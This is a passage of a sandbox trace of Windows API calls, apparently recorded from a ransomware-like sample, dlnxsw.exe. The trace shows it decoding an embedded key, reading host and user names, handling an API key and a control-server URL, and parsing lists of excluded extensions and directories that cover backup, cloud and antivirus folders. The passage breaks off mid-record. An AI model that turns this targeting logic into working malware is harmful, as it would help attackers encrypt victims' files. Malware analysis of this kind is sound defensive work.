lpMultiByteStr=0x1fa4fd0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0058.016] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa4fd0, cbMultiByte=38, lpWideCharStr=0x1f9e44c, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 [0058.016] FreeResource (hResData=0x526358) returned 0 [0058.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0058.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa4fd4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0058.017] GetCurrentThreadId () returned 0xa68 [0058.017] GetCurrentThreadId () returned 0xa68 [0058.017] GetCurrentThreadId () returned 0xa68 [0058.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f14868, cbMultiByte=402, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 402 [0058.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f14868, cbMultiByte=402, lpWideCharStr=0x1f1a9cc, cchWideChar=402 | out: lpWideCharStr="1536\r\n6861B1779D4EC040A906FF0F6FB7360910E6153D052ED77FDA1D590C9DBA9410C8D1A611D4D40499852FBD20A88D789FB460104FB4520829DA401D9C567CD039EC13AB16D1FA74E80F80E7DB90C5D04CEEC2A2A37F81844DCB0D3B3F7FEC102849E3EAE9DB70727C56D0D3126BC2BC48A62D1A1469FBDDF37508F803C55EF66F424FA3E2CDF20609B9FDD240719A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043\r\n00010001\r\n") returned 402 [0058.017] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="6861B1779D4EC040A906FF0F6FB7360910E6153D052ED77FDA1D590C9DBA9410C8D1A611D4D40499852FBD20A88D789FB460104FB4520829DA401D9C567CD039EC13AB16D1FA74E80F80E7DB90C5D04CEEC2A2A37F81844DCB0D3B3F7FEC102849E3EAE9DB70727C56D0D3126BC2BC48A62D1A1469FBDDF37508F803C55EF66F424FA3E2CDF20609B9FDD240719A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043", cchWideChar=384, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 384 [0058.017] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="6861B1779D4EC040A906FF0F6FB7360910E6153D052ED77FDA1D590C9DBA9410C8D1A611D4D40499852FBD20A88D789FB460104FB4520829DA401D9C567CD039EC13AB16D1FA74E80F80E7DB90C5D04CEEC2A2A37F81844DCB0D3B3F7FEC102849E3EAE9DB70727C56D0D3126BC2BC48A62D1A1469FBDDF37508F803C55EF66F424FA3E2CDF20609B9FDD240719A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043", cchWideChar=384, lpMultiByteStr=0x1ed8ebc, cbMultiByte=384, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6861B1779D4EC040A906FF0F6FB7360910E6153D052ED77FDA1D590C9DBA9410C8D1A611D4D40499852FBD20A88D789FB460104FB4520829DA401D9C567CD039EC13AB16D1FA74E80F80E7DB90C5D04CEEC2A2A37F81844DCB0D3B3F7FEC102849E3EAE9DB70727C56D0D3126BC2BC48A62D1A1469FBDDF37508F803C55EF66F424FA3E2CDF20609B9FDD240719A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043", lpUsedDefaultChar=0x0) returned 384 [0058.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="00010001", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="00010001", cchWideChar=8, lpMultiByteStr=0x1f72bcc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="00010001", lpUsedDefaultChar=0x0) returned 8 [0058.018] GetCurrentThreadId () returned 0xa68 [0058.018] GetCurrentThreadId () returned 0xa68 [0058.018] GetCurrentThreadId () returned 0xa68 [0058.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ecf88c, cbMultiByte=384, lpWideCharStr=0x18e60c, cchWideChar=2047 | out: lpWideCharStr="6861B1779D4EC040A906FF0F6FB7360910E6153D052ED77FDA1D590C9DBA9410C8D1A611D4D40499852FBD20A88D789FB460104FB4520829DA401D9C567CD039EC13AB16D1FA74E80F80E7DB90C5D04CEEC2A2A37F81844DCB0D3B3F7FEC102849E3EAE9DB70727C56D0D3126BC2BC48A62D1A1469FBDDF37508F803C55EF66F424FA3E2CDF20609B9FDD240719A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043") returned 384 [0058.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ef099c, cbMultiByte=256, lpWideCharStr=0x18e2ac, cchWideChar=2047 | out: lpWideCharStr="2660EAA9CA5C3071CB7CEE13B28E31773E911E7D7AE4385264009F4759A69B8CC43C00A253F2D9D7B2ACA1ACEE929287D019FA05131606C176C60B38CD10469700CC1C91CE0EFF4CC8A774B680E68EB2DD0B552494E168E24D0BF5457D3495655A325B4DB40EAAA6B36C449BF9AB2BF6E9A9A549A816ACE0AD017008623893CD") returned 256 [0058.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ecf88c, cbMultiByte=384, lpWideCharStr=0x18e2ac, cchWideChar=2047 | out: lpWideCharStr="6861B1779D4EC040A906FF0F6FB7360910E6153D052ED77FDA1D590C9DBA9410C8D1A611D4D40499852FBD20A88D789FB460104FB4520829DA401D9C567CD039EC13AB16D1FA74E80F80E7DB90C5D04CEEC2A2A37F81844DCB0D3B3F7FEC102849E3EAE9DB70727C56D0D3126BC2BC48A62D1A1469FBDDF37508F803C55EF66F424FA3E2CDF20609B9FDD240719A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 384 [0058.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ef099c, cbMultiByte=256, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="2660EAA9CA5C3071CB7CEE13B28E31773E911E7D7AE4385264009F4759A69B8CC43C00A253F2D9D7B2ACA1ACEE929287D019FA05131606C176C60B38CD10469700CC1C91CE0EFF4CC8A774B680E68EB2DD0B552494E168E24D0BF5457D3495655A325B4DB40EAAA6B36C449BF9AB2BF6E9A9A549A816ACE0AD017008623893CD9A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 256 [0058.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ef099c, cbMultiByte=256, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="15B0842E7D0CE8DC06F28DE257F10087B1B67612D8570E7591CAC039A4B30209E6053B1E826F272A3DF24E54DB67BEA43EB9CF90FA9E6227082718C47B300D943E5FDC3BED7FE5F32BC12615C577E84C4D83E69E27BFCAD356213B74DD5DA6FCB76C5C07E8C8AF6C5D1CB792AF8EF52664755DE2DC88A60A3111B76FBB0C49C99A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 256 [0058.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f72bac, cbMultiByte=8, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="000100017D0CE8DC06F28DE257F10087B1B67612D8570E7591CAC039A4B30209E6053B1E826F272A3DF24E54DB67BEA43EB9CF90FA9E6227082718C47B300D943E5FDC3BED7FE5F32BC12615C577E84C4D83E69E27BFCAD356213B74DD5DA6FCB76C5C07E8C8AF6C5D1CB792AF8EF52664755DE2DC88A60A3111B76FBB0C49C99A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 8 [0058.019] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ecf88c, cbMultiByte=128, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="F0C2C0FB6B92318DC44FCD50EB0DBD1DA2B9EB8B568C4F1143C33E70D4AA772DE2D6A690DE4EC4D676B6AB9254F74ABEA238759CD0060885A1C4951A906DE62B3E5FDC3BED7FE5F32BC12615C577E84C4D83E69E27BFCAD356213B74DD5DA6FCB76C5C07E8C8AF6C5D1CB792AF8EF52664755DE2DC88A60A3111B76FBB0C49C99A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 128 [0058.019] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ecf88c, cbMultiByte=128, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="28CECBEF0289F0A13005DC4B24D031C0A62EB6D83FC53BF78AD5D429EE432C3421C4C4FA82AA586062E9128297A7D5A05512EBA235F1DA513C3AB583201329E73E5FDC3BED7FE5F32BC12615C577E84C4D83E69E27BFCAD356213B74DD5DA6FCB76C5C07E8C8AF6C5D1CB792AF8EF52664755DE2DC88A60A3111B76FBB0C49C99A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 128 [0058.019] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ef0bdc, cbMultiByte=256, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="2660EAA9CA5C3071CB7CEE13B28E31773E911E7D7AE4385264009F4759A69B8CC43C00A253F2D9D7B2ACA1ACEE929287D019FA05131606C176C60B38CD104695E73A8FA75FF2DD1DD451CB1A71089FD49422B2C0FE8FDDD97E72E2AABA46F2035596EFC253158D6FD9CC86870D0C0B97F25E440AA21ECA09CF02256AB1B783BC9A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 256 [0058.019] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ecf88c, cbMultiByte=128, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="701CE0ACB35CF28267A6199FD2B5251985CB39EA3AB53FA4747F98B605F2136964B63BFE3DE74435F23602133449AB9EB5FFC094F331BC0A2E58526E7A4F12DDE73A8FA75FF2DD1DD451CB1A71089FD49422B2C0FE8FDDD97E72E2AABA46F2035596EFC253158D6FD9CC86870D0C0B97F25E440AA21ECA09CF02256AB1B783BC9A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 128 [0058.019] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ecf88c, cbMultiByte=128, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="13C8B66C28E1F14C6438E32577328C7C66D50D06685C5A075842F4BA636E23971EAC0407A3A3AC77065D1301473F323DAA212326205B21C9F2964FFBC368270FE73A8FA75FF2DD1DD451CB1A71089FD49422B2C0FE8FDDD97E72E2AABA46F2035596EFC253158D6FD9CC86870D0C0B97F25E440AA21ECA09CF02256AB1B783BC9A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 128 [0058.019] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1f72bcc, cbMultiByte=8, lpWideCharStr=0x18e2e0, cchWideChar=2047 | out: lpWideCharStr="0000000028E1F14C6438E32577328C7C66D50D06685C5A075842F4BA636E23971EAC0407A3A3AC77065D1301473F323DAA212326205B21C9F2964FFBC368270FE73A8FA75FF2DD1DD451CB1A71089FD49422B2C0FE8FDDD97E72E2AABA46F2035596EFC253158D6FD9CC86870D0C0B97F25E440AA21ECA09CF02256AB1B783BC9A4A566D5E17E2B30E41116E9B112D6E5DCF04EF376212409B227DFA252D1DCD161ED55AB3A77BE60663175466EEC112E5C043๤忣?ဗ\x18륰@Ӥ") returned 8 [0058.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[DONE]: ", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[DONE]: ", cchWideChar=8, lpMultiByteStr=0x1f72c0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[DONE]: ", lpUsedDefaultChar=0x0) returned 8 [0058.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="2660EAA9CA5C3071", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0058.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="2660EAA9CA5C3071", cchWideChar=16, lpMultiByteStr=0x1f88654, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2660EAA9CA5C3071", lpUsedDefaultChar=0x0) returned 16 [0058.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x18eb88, cchWideChar=2047 | out: lpWideCharStr="\rhﮤ\x18\x18\x18") returned 1 [0058.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0058.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1f7a084, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0058.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x18eb88, cchWideChar=2047 | out: lpWideCharStr="\nhﮤ\x18\x18\x18") returned 1 [0058.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0058.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1f7a084, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0058.094] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x18fba8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x18fba8*=0x1a, lpOverlapped=0x0) returned 1 [0058.095] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x1f1484c, nSize=0x8000 | out: lpDst="XDUWTFONO") returned 0xa [0058.095] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x1f1484c, nSize=0x8000 | out: lpDst="5p5NrGJn0jS HALPmcxz") returned 0x15 [0058.095] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f72c0c, cbMultiByte=12, lpWideCharStr=0x18ead4, cchWideChar=2047 | out: lpWideCharStr="bg85_api_key\x01") returned 12 [0058.096] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f8867c, cbMultiByte=21, lpWideCharStr=0x18ead0, cchWideChar=2047 | out: lpWideCharStr="http://sec.timerz.org盃\x18ﮤ\x18\x01") returned 21 [0058.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80df0, dwCreationFlags=0x4, lpThreadId=0x1f9e3e4 | out: lpThreadId=0x1f9e3e4*=0x324) returned 0x16c [0058.096] SetThreadPriority (hThread=0x16c, nPriority=0) returned 1 [0058.096] ResumeThread (hThread=0x16c) returned 0x1 [0058.096] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0058.096] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f7a09c, cbMultiByte=4, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="BG85\x01") returned 4 [0058.097] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x4f5480 [0058.097] LoadResource (hModule=0x400000, hResInfo=0x4f5480) returned 0x526574 [0058.097] SizeofResource (hModule=0x400000, hResInfo=0x4f5480) returned 0x548 [0058.097] LockResource (hResData=0x526574) returned 0x526574 [0058.097] FreeResource (hResData=0x526574) returned 0 [0058.097] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0058.097] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0058.097] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0058.097] LockResource (hResData=0x526358) returned 0x526358 [0058.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa5008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0058.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa5008, cbMultiByte=38, lpWideCharStr=0x1f9e50c, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 [0058.098] FreeResource (hResData=0x526358) returned 0 [0058.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0058.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0058.098] GetCurrentThreadId () returned 0xa68 [0058.098] GetCurrentThreadId () returned 0xa68 [0058.098] GetCurrentThreadId () returned 0xa68 [0058.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f3ade8, cbMultiByte=1352, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1352 [0058.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f3ade8, cbMultiByte=1352, lpWideCharStr=0x1ed79fc, cchWideChar=1352 | out: lpWideCharStr="[NF_START]\r\nVBS\r\nRTF\r\nBMP\r\nTMP\r\nRDP\r\nSEK\r\nICO\r\nDLL\r\nBLF\r\nRBS\r\nREGTRANS-MS\r\nSETTINGCONTENT-MS\r\nSEARCH-MS\r\nLOG\r\nXML\r\nLOG1\r\nLOG2\r\n[NF_END]\r\n[ND_START]\r\n\\PERFLOGS\\\r\n\\WINDOWS\\\r\n\\WINDOWS.OLD\\\r\n\\WINDOWS10UPGRADE\\\r\n\\$RECYCLE.BIN\\\r\n\\WINDOWS NT\\\r\n\\COMMON FILES\\\r\n\\TEMP\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\nFILES\\ACRONIS\\\r\n(X86)\\ACRONIS\\\r\nFILES\\BACKUPCLIENT\\\r\n(X86)\\BACKUPCLIENT\\\r\nFILES\\BACKUP MANAGER\\\r\n(X86)\\BACKUP MANAGER\\\r\nFILES\\CARBONITE\\\r\n(X86)\\CARBONITE\\\r\nFILES\\GOOGLE\\DRIVE\\\r\n(X86)\\GOOGLE\\DRIVE\\\r\nFILES\\DROPBOX\\\r\n(X86)\\DROPBOX\\\r\nFILES\\MICROSOFT ONEDRIVE\\\r\n(X86)\\MICROSOFT ONEDRIVE\\\r\nFILES\\ONEDRIVE\\\r\n(X86)\\ONEDRIVE\\\r\nVNC\\\r\n\\INTERNET EXPLORER\\\r\n\\MICROSOFT\\OFFICE\\\r\n\\MICROSOFT OFFICE\\\r\n\\WINDOWS SIDEBAR\\\r\n\\WINDOWS MEDIA PLAYER\\\r\n\\DVD MAKER\\\r\n\\WINDOWSPOWERSHELL\\\r\n\\WINDOWS DEFENDER\\\r\n\\TOR BROWSER\\\r\n\\ASPNET_CLIENT\\\r\n\\REFERENCE ASSEMBLIES\\\r\n\\MICROSOFT\\PROVISIONING\\\r\n\\MICROSOFT SILVERLIGHT\\\r\n\\PROGRAMDATA\\MICROSOFT\\\r\n\\MICROSOFT\\CRYPTO\\\r\n\\WINDOWSAPPS\\\r\n\\7-ZIP\\\r\n\\WINRAR\\\r\n\\ESET\r\n\\AVAST\r\n\\MALWAREBYTES\r\n\\SYMANTEC ENDPOINT\r\n\\TREND MICRO\r\n\\BITDEFENDER\r\n\\PANDA SECURITY\r\n\\MCAFEE\r\n\\KASPERSKY LAB\r\n\\KASPERSKYLAB\r\n\\AVDEFENDER\r\n\\SOPHOS\r\n\\AVG\r\n[ND_END]\r\n[FEX_START]\r\nNTUSER.DAT\r\nNTUSER.POL\r\nNTUSER.DAT.LOG\r\nNTUSER.DAT.LOG1\r\nNTUSER.DAT.LOG2\r\nICONCACHE.DB\r\nTHUMBS.DB\r\nBOOTSECT.BAK\r\nBOOTMGR\r\nDEFAULT.RDP\r\nPAGEFILE.SYS\r\nHIBERFIL.SYS\r\nSWAPFILE.SYS\r\nWORDPAD.EXE\r\n[FEX_END]\r\n") returned 1352 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, 